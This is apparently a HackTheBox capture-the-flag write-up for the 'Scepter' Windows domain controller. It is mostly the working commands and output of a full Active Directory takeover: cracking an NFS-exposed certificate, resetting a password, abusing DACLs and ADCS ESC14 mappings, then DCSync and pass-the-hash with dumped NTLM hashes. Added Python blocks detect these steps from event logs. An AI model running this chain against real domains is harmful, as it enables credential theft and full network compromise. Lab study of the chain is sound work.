Scepter Writeup

0x5t
Security Researcher
Team: RaptX
Joined: 2024
Tags: HackTheBox, Windows, Active Directory, NFS, DCSync

This is a hard difficulty Active Directory machine that involves an NFS share, certificate abuse, and multiple chained DACL vulnerabilities to achieve a full domain compromise. The exploitation chain leverages an initial unauthenticated NFS share, a cracked PFX certificate, and several AD Certificate Services (ADCS) misconfigurations.


Quick Metadata

  Machine:        Scepter
  Difficulty:     Hard
  IP:             10.10.10.10
  OS:             Windows
  Primary Vulns:  NFS, ADCS ESC14, DACL Abuse, DCSync

Exploitation Chain (High-Level)

  1. Exposed NFS share allows download of user certificates.
  2. The password for a PFX certificate is cracked, providing a foothold as user d.baker.
  3. AD is enumerated, revealing DACL abuses, specifically a ForceChangePassword right on user a.carter.
  4. The d.baker user, a member of IT SUPPORT, has GenericAll ACL over the STAFF ACCESS CERTIFICATE OU.
  5. The h.brown user account is compromised by modifying their mail LDAP attribute and enrolling in a certificate template, leveraging an ADCS ESC14 vulnerability.
  6. The h.brown user, a member of CMS, has Alt-Security-Identities write privileges over the HELPDESK ENROLLMENT CERTIFICATE OU, which contains the p.adams user account.
  7. An ADCS ESC14 attack is performed on p.adams to gain a certificate-based TGT.
  8. The p.adams account has DCSync privileges, allowing for a full domain compromise and access as Administrator.

Pre-Reqs

  • Tooling: nmap, showmount, certipy, john, impacket-dacledit, impacket-addcomputer, impacket-secretsdump, evil-winrm, Bloodhound.py
  • Skills: Active Directory enumeration, AD Certificate Services concepts, DACL abuse, Kerberos authentication with certificates.

Skills Required

  • Basic Active Directory enumeration
  • Working with ADCS and Certipy for certificate-based authentication
  • NFS usage and password cracking with John

Skills Learned

  • Performing ADCS ESC14 attacks by modifying the altSecurityIdentities attribute
  • Chaining DACL abuses to map certificates to different user accounts
  • Executing DCSync attacks to obtain Administrator hashes

Enumeration

Network Scan

The initial Nmap scan reveals several open ports on the target machine, which is identified as a Windows domain controller. Key services like DNS (53), Kerberos (88), MSRPC (135), LDAP (389, 636), SMB (445), and NFS (2049) are running. The domain name is identified as scepter.htb.

Nmap Commands

nmap -Pn -sC -sV -oN scans/initial.nmap 10.10.10.10
nmap -Pn -p- --min-rate 5000 -T4 -oN scans/full_tcp.nmap 10.10.10.10

Ports discovered:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  ncacn_http
636/tcp   open  ssl/ldap
2049/tcp  open  nlockmgr
3268/tcp  open  ldap
3269/tcp  open  ssl/ldap
5985/tcp  open  http
5986/tcp  open  ssl/http
9389/tcp  open  mc-nmf
47001/tcp open  http

Service-Specific Enumeration

NFS is running on port 2049. Listing the server's exports reveals a /helpdesk share that is exported to everyone, with no client restriction.

showmount -e 10.10.10.10

The output shows:

Export list for 10.10.10.10:
/helpdesk (everyone)

Mounting the share reveals several certificate and key files.

mkdir Mount
sudo mount -t nfs -o rw,vers=3 10.10.10.10:/helpdesk Mount/
sudo ls Mount/

The mounted directory contains baker.crt, baker.key, clark.pfx, lewis.pfx, and scott.pfx.

Credentials / Artifacts Discovered

The PFX files are encrypted. The password for lewis.pfx can be cracked using john.

pfx2john lewis.pfx > lewis.hash
john -w=/usr/share/wordlists/rockyou.txt lewis.hash

The password for lewis.pfx is newpassword.

The baker.key file is also encrypted, and the same password newpassword works.


Foothold

A foothold is established by authenticating as the d.baker user. The lewis.pfx file, once cracked, reveals a revoked certificate, but the baker.crt and baker.key files can be combined and used.

First, the private key is decrypted.

openssl rsa -in baker.key -out baker-decrypted.key

Next, the decrypted key and certificate are combined to create an unencrypted PFX file.

cat baker-decrypted.key > baker.pem
tail -n36 baker.crt >> baker.pem
openssl pkcs12 -in baker.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out baker.pfx

Finally, this PFX file is used with certipy to authenticate and retrieve a TGT and the NTLM hash for the d.baker user.

certipy auth -pfx baker.pfx -domain scepter.htb -dc-ip 10.10.10.10
[*] Got TGT
[*] Saving credential cache to 'd.baker.ccache'
[*] Got hash for 'd.baker@scepter.htb':
aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce

Lateral Movement

As d.baker, the domain is enumerated with Bloodhound.py to identify privilege escalation paths.

python3 /opt/BloodHound.py/bloodhound.py -u 'd.baker' --hashes :18b5fb0d99e7a475316213c15b6f22ce -d scepter.htb -dc dc01.scepter.htb --zip -c All -ns 10.10.10.10

Bloodhound reveals that d.baker has a ForceChangePassword ACL on the a.carter user account. d.baker is also a member of the IT SUPPORT group, which has GenericAll rights over the STAFF ACCESS CERTIFICATE Organizational Unit (OU).

The a.carter user's password is reset through the ForceChangePassword right, authenticating with the d.baker Kerberos ticket obtained above.

net rpc password 'A.CARTER' 'Password1!' -S 'DC01.SCEPTER.HTB' --use-kerberos required

Next, the GenericAll ACL on the OU is abused to grant d.baker full control.

impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal d.baker -target-dn 'OU=Staff Access Certificate, DC=Scepter, DC=htb' -dc-ip dc01.scepter.htb 'scepter.htb/a.carter:Password1!' -use-ldaps

The mail LDAP attribute of the d.baker user account is then modified to h.brown@scepter.htb.

cat modify_email.ldif
dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: h.brown@scepter.htb
ldapmodify -Y GSSAPI -H ldap://dc01.scepter.htb -f modify_email.ldif

A new certificate is then requested as d.baker; because the template builds the certificate's identity from the mail attribute, the issued certificate now corresponds to h.brown.

certipy req -u d.baker@scepter.htb -k -ca SCEPTER-DC01-CA -template "StaffAccessCertificate" -target dc01.scepter.htb

This certificate is then used to authenticate as h.brown.

certipy auth -pfx d.baker.pfx -domain scepter.htb -username h.brown -dc-ip 10.10.10.10

The NTLM hash for h.brown is recovered, allowing for a remote WinRM session.

[*] Got hash for 'h.brown@scepter.htb':
aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
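From a defender's side, the mail rewrite above (and the altSecurityIdentities write performed later against p.adams) is the observable moment of this chain: with Directory Service Changes auditing enabled on the user objects, each such write produces Event ID 5136 on the domain controller. The detection logic below is an added example, not part of the original writeup or of any tool it uses. The records are constructed to mirror the two writes in this post; the SCEPTER\svc_idm writer is a hypothetical provisioning account included only to show how expected writers are allow-listed.

```python
"""Flag Directory Service Changes (Event ID 5136) that rewrite attributes which
decide which certificate a user account will accept. Added example; the sample
records below are constructed, not captured from the Scepter machine."""
from dataclasses import dataclass
from typing import Iterable, List, Set

# Attributes that change certificate-to-account mapping. altSecurityIdentities is an
# explicit mapping (ESC14); the others are copied into the SAN when a template builds
# the subject from the requesting account, so rewriting them changes who a new
# certificate identifies.
MAPPING_ATTRIBUTES = {
    "altSecurityIdentities",
    "mail",
    "userPrincipalName",
    "dNSHostName",
}


@dataclass
class DirectoryChange:
    event_id: int
    subject: str        # DOMAIN\account that performed the write
    object_dn: str      # object whose attribute changed
    attribute: str      # LDAP display name of the attribute
    value: str          # value added or deleted
    operation: str      # "Value Added" or "Value Deleted"


@dataclass
class Alert:
    subject: str
    object_dn: str
    attribute: str
    value: str
    reason: str


def _account(subject: str) -> str:
    return subject.split("\\")[-1].lower()


def is_self_write(change: DirectoryChange) -> bool:
    """True when an account edits its own object (d.baker rewriting d.baker's mail)."""
    rdn = change.object_dn.split(",")[0]
    cn = rdn[3:] if rdn.upper().startswith("CN=") else rdn
    return _account(change.subject) == cn.lower()


def detect_mapping_changes(changes: Iterable[DirectoryChange],
                           allowed_writers: Set[str]) -> List[Alert]:
    """Return one Alert per mapping-relevant write by a non-allow-listed account."""
    alerts: List[Alert] = []
    for c in changes:
        if c.event_id != 5136 or c.operation != "Value Added":
            continue
        if c.attribute not in MAPPING_ATTRIBUTES:
            continue
        if _account(c.subject) in {w.lower() for w in allowed_writers}:
            continue
        if c.attribute == "altSecurityIdentities":
            reason = "explicit certificate mapping written by non-PKI account"
        elif is_self_write(c):
            reason = "account rewrote its own SAN-source attribute"
        else:
            reason = "SAN-source attribute written by non-PKI account"
        alerts.append(Alert(c.subject, c.object_dn, c.attribute, c.value, reason))
    return alerts


# Constructed records modelled on the two writes this writeup performs, plus a
# benign provisioning write (svc_idm is hypothetical) and an unrelated attribute.
SAMPLE_CHANGES = [
    DirectoryChange(5136, "SCEPTER\\d.baker",
                    "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb",
                    "mail", "h.brown@scepter.htb", "Value Added"),
    DirectoryChange(5136, "SCEPTER\\h.brown",
                    "CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb",
                    "altSecurityIdentities",
                    "X509:<I>DC=htb,DC=scepter,CN=Scepter-DC01-CA"
                    "<SR>0400000000008F82D76B406E0A300400000062", "Value Added"),
    DirectoryChange(5136, "SCEPTER\\svc_idm",
                    "CN=j.doe,OU=Users,DC=scepter,DC=htb",
                    "mail", "j.doe@scepter.htb", "Value Added"),
    DirectoryChange(5136, "SCEPTER\\h.brown",
                    "CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb",
                    "description", "Helpdesk", "Value Added"),
]

if __name__ == "__main__":
    for a in detect_mapping_changes(SAMPLE_CHANGES, allowed_writers={"svc_idm"}):
        print(f"{a.subject} -> {a.object_dn} [{a.attribute}] {a.reason}")
```

Running the block prints two alerts, one per attack step; the self-write rule is what separates d.baker's rewrite of its own mail attribute from routine directory maintenance, and the allow-list keeps the provisioning account's writes quiet.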

h.brown is a member of the Protected Users group, which blocks NTLM authentication, so the WinRM session is established with the Kerberos TGT instead of the hash.

evil-winrm -i dc01.scepter.htb -r scepter.htb

The user flag is found at C:\Users\h.brown\desktop\user.txt.


Privilege Escalation

Vector 1: ADCS ESC14 via altSecurityIdentities

As h.brown, further LDAP enumeration reveals that the CMS group has write privileges (writeProperty) on the altSecurityIdentities attribute of any descendant objects within the Helpdesk Enrollment Certificate OU. The p.adams user account is the only object in this OU.

netexec ldap scepter.htb -u h.brown --use-kcache -M daclread -o TARGET_DN="OU=Helpdesk Enrollment Certificate, DC=Scepter, DC=htb" ACTION=read PRINCIPAL="CMS"

The HelpdeskEnrollmentCertificate template allows any domain computer to enroll. Since the MachineAccountQuota is 0, ordinary users cannot create computer accounts, so a new one is created inside the STAFF ACCESS CERTIFICATE OU, where control was granted earlier, using the previously gained a.carter credentials.

impacket-addcomputer scepter.htb/A.CARTER:'Password1!' -dc-host dc01.scepter.htb -method LDAPS -computer-name 'PWN_PC' -computer-pass 'rSMJWvBeyAtjThzk!' -computer-group "OU=Staff Access Certificate, DC=Scepter, DC=htb"

A certificate is requested for the new computer account, PWN_PC$.

certipy req -u PWN_PC\$@scepter.htb -p 'rSMJWvBeyAtjThzk!' -ca scepter-DC01-CA -template "Helpdesk Enrollment Certificate" -target dc01.scepter.htb

The altSecurityIdentities attribute of p.adams is set to an X509IssuerSerialNumber mapping for the new certificate: the issuer DN with its RDNs in reverse order after <I>, and the certificate serial number with its bytes in reverse order after <SR>.

cat modify_altSecurityIdentities.ldif
dn: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=SCEPTER,DC=HTB
changetype: modify
replace: altSecurityIdentities
altSecurityIdentities: X509:<I>DC=htb,DC=scepter,CN=Scepter-DC01-CA<SR>0400000000008F82D76B406E0A300400000062
ldapmodify -Y GSSAPI -H ldap://dc01.scepter.htb -f modify_altSecurityIdentities.ldif
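The value written above is the X509IssuerSerialNumber form, one of the mapping types Microsoft classifies as strong in KB5014754 (the others being X509SKI and X509SHA1PublicKey; X509IssuerSubject, X509SubjectOnly and X509RFC822 are weak). The parser and builder below are an added example, not code from this writeup or from Certipy, for auditing altSecurityIdentities values and converting between a certificate's serial as printed by openssl and the byte-reversed <SR> form. The certificate-order serial it recovers is computed from the <SR> value on this page, not read from the certificate itself, and the X509RFC822 sample is constructed for illustration.

```python
"""Parse, build and classify altSecurityIdentities values. Added example; the
X509IssuerSerialNumber sample is the value from this writeup, the rest is constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Tag sequences -> mapping name. Strong mappings bind to one certificate; weak ones
# match on names a template may derive from attributes an enrollee can influence.
STRONG_TAGS = {("I", "SR"): "X509IssuerSerialNumber",
               ("SKI",): "X509SKI",
               ("SHA1-PUKEY",): "X509SHA1PublicKey"}
WEAK_TAGS = {("I", "S"): "X509IssuerSubject",
             ("S",): "X509SubjectOnly",
             ("RFC822",): "X509RFC822"}
_FIELD = re.compile(r"<([A-Z0-9-]+)>")


@dataclass
class Mapping:
    kind: str
    strong: bool
    fields: Dict[str, str]


def reverse_hex_bytes(hex_str: str) -> str:
    """<SR> holds the serial with its byte order reversed relative to the
    certificate; the same operation converts in either direction."""
    h = hex_str.replace(":", "").replace(" ", "").upper()
    if len(h) % 2:
        raise ValueError("serial must be a whole number of bytes")
    return "".join(h[i:i + 2] for i in range(len(h) - 2, -1, -2))


def reverse_dn(dn: str) -> str:
    """<I> lists the issuer RDNs in reverse order (DC=htb,DC=scepter,CN=...)."""
    return ",".join(reversed([r.strip() for r in dn.split(",")]))


def build_issuer_serial_mapping(issuer_dn: str, cert_serial_hex: str) -> str:
    """Compose the strong mapping for a certificate whose issuer and serial are
    as shown by `openssl x509 -noout -issuer -serial`."""
    return f"X509:<I>{reverse_dn(issuer_dn)}<SR>{reverse_hex_bytes(cert_serial_hex)}"


def parse_mapping(value: str) -> Optional[Mapping]:
    """Split an X509:<TAG>content... value into its fields and classify it."""
    if not value.startswith("X509:"):
        return None                       # Kerberos: and other forms are out of scope
    body = value[len("X509:"):]
    tags = tuple(_FIELD.findall(body))
    parts = _FIELD.split(body)[1:]        # alternating tag, content
    fields = {parts[i]: parts[i + 1] for i in range(0, len(parts), 2)}
    if tags in STRONG_TAGS:
        return Mapping(STRONG_TAGS[tags], True, fields)
    if tags in WEAK_TAGS:
        return Mapping(WEAK_TAGS[tags], False, fields)
    return Mapping("unknown", False, fields)


def certificate_serial_from_mapping(value: str) -> Optional[str]:
    """Recover the serial in certificate byte order from an <I>/<SR> mapping."""
    m = parse_mapping(value)
    if m is None or m.kind != "X509IssuerSerialNumber":
        return None
    return reverse_hex_bytes(m.fields["SR"])


def audit_mappings(entries: Dict[str, List[str]]) -> List[Tuple[str, str, str]]:
    """Report every explicit mapping per DN as (dn, kind, 'strong'|'weak'). Any
    explicit mapping overrides the certificate's own subject during PKINIT and
    Schannel logon, so all of them deserve review, weak ones first."""
    findings = []
    for dn, values in entries.items():
        for v in values:
            m = parse_mapping(v)
            if m is not None:
                findings.append((dn, m.kind, "strong" if m.strong else "weak"))
    return sorted(findings, key=lambda f: f[2] != "weak")


if __name__ == "__main__":
    sample = {
        "CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb":
            ["X509:<I>DC=htb,DC=scepter,CN=Scepter-DC01-CA"
             "<SR>0400000000008F82D76B406E0A300400000062"],
        "CN=example,DC=scepter,DC=htb":                     # constructed entry
            ["X509:<RFC822>example@scepter.htb"],
    }
    for finding in audit_mappings(sample):
        print(finding)
```

The audit returns the constructed weak entry first and the p.adams mapping second; the point for a reviewer is that a strong mapping is only as trustworthy as the account that wrote it, so the write permission on altSecurityIdentities matters as much as the mapping format.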

The p.adams user account is then compromised by using the PWN_PC$ certificate to request a TGT.

certipy auth -pfx pwn_pc.pfx -domain scepter.htb -username p.adams -dc-ip 10.10.10.10

The NTLM hash for p.adams is retrieved.

[*] Got hash for 'p.adams@scepter.htb':
aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0

The p.adams user is a Replication Operator and has DCSync privileges, allowing for a full domain compromise. The Administrator hash is dumped.

impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0 scepter.htb/p.adams@dc01.scepter.htb -just-dc-user Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
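The DCSync step leaves its own trace: with Directory Service Access auditing on the domain naming context, each replication request is logged as Event ID 4662 against the domainDNS object, with the replication control-access rights listed in the Properties field. Legitimate replication comes from domain controller computer accounts, so a request carrying DS-Replication-Get-Changes-All from any other principal is the signal. The detection below is an added example, not from this writeup or any tool it uses; the event records are constructed to mirror the p.adams request alongside normal DC01 replication.

```python
"""Flag DCSync-style replication requests in Event ID 4662 records. Added example;
the events below are constructed, not captured from the Scepter machine."""
from dataclasses import dataclass
from typing import Iterable, List, Set

# Extended-rights GUIDs used by replication. Get-Changes-All is the one that returns
# secret attributes (password hashes), so its presence is the DCSync indicator.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"   # schemaIDGUID of domainDNS


@dataclass
class AccessEvent:
    event_id: int
    subject: str        # DOMAIN\account exercising the right
    object_type: str    # schema GUID of the object class (ObjectType field)
    properties: str     # Properties field: access names followed by {guid} tokens


@dataclass
class DcsyncAlert:
    subject: str
    rights: List[str]


def property_guids(properties: str) -> Set[str]:
    """Pull the {guid} tokens out of the Properties field."""
    return {tok.strip("{}").lower() for tok in properties.split() if tok.startswith("{")}


def is_domain_controller(subject: str, dc_names: Set[str]) -> bool:
    """DC computer accounts replicate from each other as part of normal operation."""
    account = subject.split("\\")[-1]
    return account.endswith("$") and account[:-1].upper() in {d.upper() for d in dc_names}


def detect_dcsync(events: Iterable[AccessEvent], dc_names: Set[str]) -> List[DcsyncAlert]:
    """One alert per 4662 on the domain object that requests Get-Changes-All from a
    principal that is not a known domain controller account."""
    alerts: List[DcsyncAlert] = []
    for ev in events:
        if ev.event_id != 4662:
            continue
        if ev.object_type.strip("{}").lower() != DOMAIN_DNS_CLASS:
            continue
        guids = property_guids(ev.properties)
        if GET_CHANGES_ALL not in guids or is_domain_controller(ev.subject, dc_names):
            continue
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        alerts.append(DcsyncAlert(ev.subject, rights))
    return alerts


# Constructed events: DC01 replicating (benign), p.adams replicating (the DCSync
# from this writeup), and p.adams reading a user object (not replication).
SAMPLE_EVENTS = [
    AccessEvent(4662, "SCEPTER\\DC01$", "{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
                "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    AccessEvent(4662, "SCEPTER\\p.adams", "{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
                "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    AccessEvent(4662, "SCEPTER\\p.adams", "{bf967aba-0de6-11d0-a285-00aa003049e2}",
                "Read Property {bf967a0a-0de6-11d0-a285-00aa003049e2}"),
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, dc_names={"DC01"}):
        print(f"possible DCSync by {a.subject}: {', '.join(a.rights)}")
```

The allow-list is the fragile part: it must contain only real domain controller accounts, since a newly joined machine account (such as the PWN_PC$ created earlier in this chain) must not be treated as a replication peer just because its name ends in a dollar sign.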

Post-Exploitation (Hashes / Loot)

A remote WinRM session is established as Administrator using the retrieved NTLM hash.

evil-winrm -i dc01.scepter.htb -u Administrator -H a291ead3493f9773dc615e66c2ea21c4

Root Flag

The root flag is located at C:\Users\Administrator\desktop\root.txt.


Summary

  1. Recon: The target was identified as a Windows domain controller with an open NFS share.
  2. Foothold: An unauthenticated NFS share provided certificate files. A PFX file's password was cracked, and a new PFX was created for a different user, d.baker, to gain an initial shell.
  3. Lateral Movement: DACL enumeration revealed several misconfigurations. The d.baker user's mail attribute was modified, allowing an ADCS ESC14 attack to compromise the h.brown user account.
  4. Privilege Escalation: Further enumeration as h.brown revealed a second ESC14 vulnerability. A new computer account was created, its certificate was used to poison the p.adams user account's altSecurityIdentities, and the p.adams account was compromised.
  5. Domination: The p.adams account's DCSync privileges were abused to dump the NTLM hash for the Administrator account, leading to a full domain compromise.

Lessons Learned

  • Unauthenticated NFS shares can expose sensitive files, including certificates and keys.
  • Misconfigured AD Certificate Services can be abused through enrollment and delegation vulnerabilities.
  • Chaining Active Directory DACL abuse with ADCS misconfigurations is a powerful technique for privilege escalation and lateral movement.
  • DCSync is a critical privilege to identify and exploit for full domain compromise.
